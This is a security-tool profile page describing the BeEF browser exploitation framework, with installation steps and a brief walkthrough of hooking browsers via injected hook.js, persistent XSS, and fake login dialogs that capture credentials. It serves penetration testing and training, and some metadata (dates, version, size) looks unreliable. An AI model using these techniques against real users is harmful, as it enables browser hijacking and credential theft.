BEEF-XSS

Pentesting Tool

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

DOWNLOADS

SYSTEM REQUIREMENTS

RAM : Minimum 512MB (Recommended: 1 GB)

Storage : 2 MB disk space for Installation.

OS : macOS 10.5.0 or higher, modern Linux (Windows is not officially supported)

Architecture : Supports both 32-bit and 64-bit architectures

Available On : macOS, Linux (Windows support is possible via Cygwin, but not officially supported)


ADDITIONAL INFORMATION

Published By

BeEF Project (maintained by a community of contributors)

Release Date

February 2006

Approximate Size

30.9 KB for Archives

Publisher Info

BeEF is an open-source project focused on web browser security and penetration testing

Supported Languages

English

Last Update

May 2024 (Version 0.5.4.0)

Programming Language

Ruby, Node.js, SQLite

Operating System

Cross-platform (macOS, Linux)

License

GNU General Public License (GPL)

  • Open source
  • The extension API
  • Restful API
  • Keystroke logging
  • Browser proxying
  • Integration with Metasploit
  • Hooking through QR codes
  • Phonegap modules
  • Plugin detection
  • Intranet service exploitation
  • Custom browser exploitation commands

  1. Hooked Browsers : This is where you'll see a list of all currently hooked browsers. Each browser is listed with details such as IP address, browser name, and operating system. As no browsers are hooked up initially, this section will be empty.
  2. Getting Started : This section provides guidance on how to use the BeEF framework. It includes information on how to hook a browser and use command modules.
  3. Logs : This section shows a log of the BeEF activity. This includes interactions with the target browsers, commands sent, responses received, and any errors or important system messages.
  4. Zombies : In BeEF terminology, a "zombie" is a hooked browser that the BeEF server controls. The "Zombies" section lists these browsers and allows you to interact with them. As no browsers are hooked yet, this section will also be empty.
  5. Basic : This view provides basic information about the hooked browser, such as the IP address, browser type, and operating system. In this view, you can also use the available command modules to interact with the hooked browser.
  6. Requester : The "Requester" view lets you manually craft and send HTTP requests from the hooked browser. This can be useful for exploring the website or web application from the perspective of the hooked browser, testing access controls, or performing other manual testing tasks.

  1. On the surface, it might seem that there's little opportunity for blue-team use of a tool like this. By applying creativity, however, there are opportunities to bolster defensive efforts, as well as red-team activities.
  2. Auditors, for example, might consider using BeEF to help validate zero-trust efforts. A key tenet of zero trust is that access to resources shouldn't be gated on the basis of point of origin alone. A tool that can help you test internal access to a resource -- using a hooked browser as a conduit -- versus external access to that same resource is important data.
  3. Alternatively, you might consider using it as part of a phishing simulation exercise after a user clicks a simulated malicious link. Or you might use it to validate your organization's browser configuration and hardening standards.

Starting BeEF
  1. Run BeEF : beef-xss
  2. Set a password for the first time : Enter new password
  3. Access the BeEF web interface : http://localhost:3000/ui/panel
Hooking a Browser
  1. Create a hook script : hook.js (default) or customize your own.
  2. Upload the hook script to a web server or a vulnerable webpage.
  3. A victim visits the webpage, and BeEF injects the hook script into their browser.
  4. The hooked browser is added to the BeEF dashboard : http://localhost:3000/ui/panel
Basic Information Gathering
  1. Select the hooked browser from the dashboard.
  2. Access the “Details” tab to gather information about the browser, such as:
    • Browser name and version
    • User Agent
    • Installed plugins
    • OS architecture
  3. Use the “Fingerprint Browser” command to gather additional information using FingerPrintjs2.
Phishing Attacks
  1. Navigate to “Commands” > "Social Engineering" > “Pretty Theft”.
  2. Select a phishing dialog type (e.g., Facebook).
  3. The hooked browser will display a fake session timeout page, requesting user credentials.
  4. An unsuspecting user may enter their credentials, which will be captured by BeEF.
Persistent XSS
  1. Inject a persistent XSS payload into a vulnerable webpage.
  2. The payload will be stored on the attacker’s server.
  3. When a victim visits the webpage, the payload will be executed, allowing the attacker to communicate with the victim’s browser.
Real-World Use Cases
  1. Penetration testing : Use BeEF to demonstrate XSS vulnerabilities to clients and simulate attacks.
  2. Red-team exercises : Utilize BeEF to test internal access controls and validate zero-trust efforts.
  3. Phishing simulations : Use BeEF to simulate phishing attacks and train users to recognize and avoid suspicious activities.
Best Practices
  1. Use BeEF responsibly and only for authorized purposes.
  2. Ensure proper configuration and hardening of your own browser and systems.
  3. Keep BeEF and its dependencies up-to-date to minimize vulnerabilities.

  • adduser
  • lsof
  • ruby
  • ruby-ansi
  • ruby-async-dns
  • ruby-dev
  • ruby-em-websocket
  • ruby-erubis
  • ruby-espeak
  • ruby-eventmachine
  • ruby-execjs
  • ruby-json
  • ruby-maxmind-db
  • ruby-mime-types
  • ruby-msfrpc-client
  • ruby-otr-activerecord
  • ruby-parseconfig
  • ruby-qr4r
  • ruby-rack
  • ruby-rack-protection
  • ruby-rushover
  • ruby-sinatra
  • ruby-slack-notifier
  • ruby-sqlite3
  • ruby-term-ansicolor
  • ruby-terser
  • ruby-twitter
  • ruby-xmlrpc
  • ruby-zip
  • rubygems-integration
  • thin
  • xdg-utils

Terminal Installation Commands ...

$ sudo apt-get update && upgrade

$ sudo apt install beef-xss

GUI Installation Steps ...
  1. Linux
    • Ensure you have Ruby 3.0+ and NodeJS installed.
    • Clone the BeEF repository from GitHub or download the latest archive.
    • Run the installation script in the BeEF directory: ./install.
    • Configure the tool by editing the config.yaml file.
  2. Windows
    • BeEF is not officially supported on Windows. However, you can use Docker to run BeEF on Windows, which simplifies the setup process.
      1. Install Docker
        • Ensure Docker is installed on your system. You can find installation instructions for your operating system on the official Docker website.
      2. Clone the BeEF Repository
        • Open a terminal and run :

        $ git clone https://github.com/beefproject/beef.git

        $ cd beef
      3. Set Your Credentials
        • Edit the config.yaml file in the BeEF directory to set your username and password. For example :

        $ credentials:

        $ user: '<YOUR_USERNAME>'

        $ passwd: '<YOUR_PASSWORD>'
      4. Build the Docker Image
        • Run the following command to build the Docker image :

        $ docker build -t beef .
      5. Run the Docker Container
        • Start the BeEF container with the following command :

        $ docker run -p 3000:3000 -p 6789:6789 --name beef beef
        • This maps the necessary ports for BeEF to your local machine.
      6. Access the BeEF Interface
        • Open your browser and navigate to http://localhost:3000/ui/authentication.
        • Log in using the credentials you set in the config.yaml file.
  3. MacOS
    • Similar to Linux, but you may need to use a Ruby environment manager like rbenv or rvm for Ruby installation.
    • Follow the same steps as Linux for cloning and running the installation script.

Terminal Uninstallation Commands ...

$ sudo apt remove beef-xss

$ sudo apt autoclean && apt autoremove

GUI Uninstallation Steps ...
Linux & MacOS
  1. Delete BeEF Directory :
    • Locate the directory where BeEF was installed (usually where the repository was cloned).
    • Delete the folder by running a command like rm -rf /path/to/beef.
  2. Remove Configuration Files :
    • If you created or modified configuration files like config.yaml, delete them manually.
  3. Uninstall Dependencies :
    • Depending on your installation, you may need to uninstall Ruby, NodeJS, or other packages. Use commands such as :

    $ sudo apt remove ruby nodejs

    $ sudo apt autoremove
Docker (Windows) :
  1. Stop the Container :
    • List all active containers: docker ps.
    • Stop the BeEF container: docker stop <container_id>.
  2. Remove the Container :
    • Run : docker rm <container_id>.
  3. Remove the Image :
    • List all images : docker images.
    • Delete the BeEF image : docker rmi <image_id>.

Copyright © 2025 HACKERSPOT

All original content, including tools, software, and other information, is protected by copyright and remains the property of its respective owners.

Subscribe for more Information
HACKERSPOT

HackerSpot is an informational platform that offers resources such as tools, software, courses, internships, and various other materials aimed at supporting individuals passionate about CyberSecurity and IT.

About Us
Docs / Links

Documentation

Tools

Softwares

Operating Systems

Learning

Courses

Internships

Virtual Labs

Colleges

Youtube Channels

Resources

Devices & Hardware

Browsers

Cyber Threat Maps

Other Resources

Contacts

Bapatla, Andhrapradesh, India 237101

bablunannam@gmail.com

+91 7995819235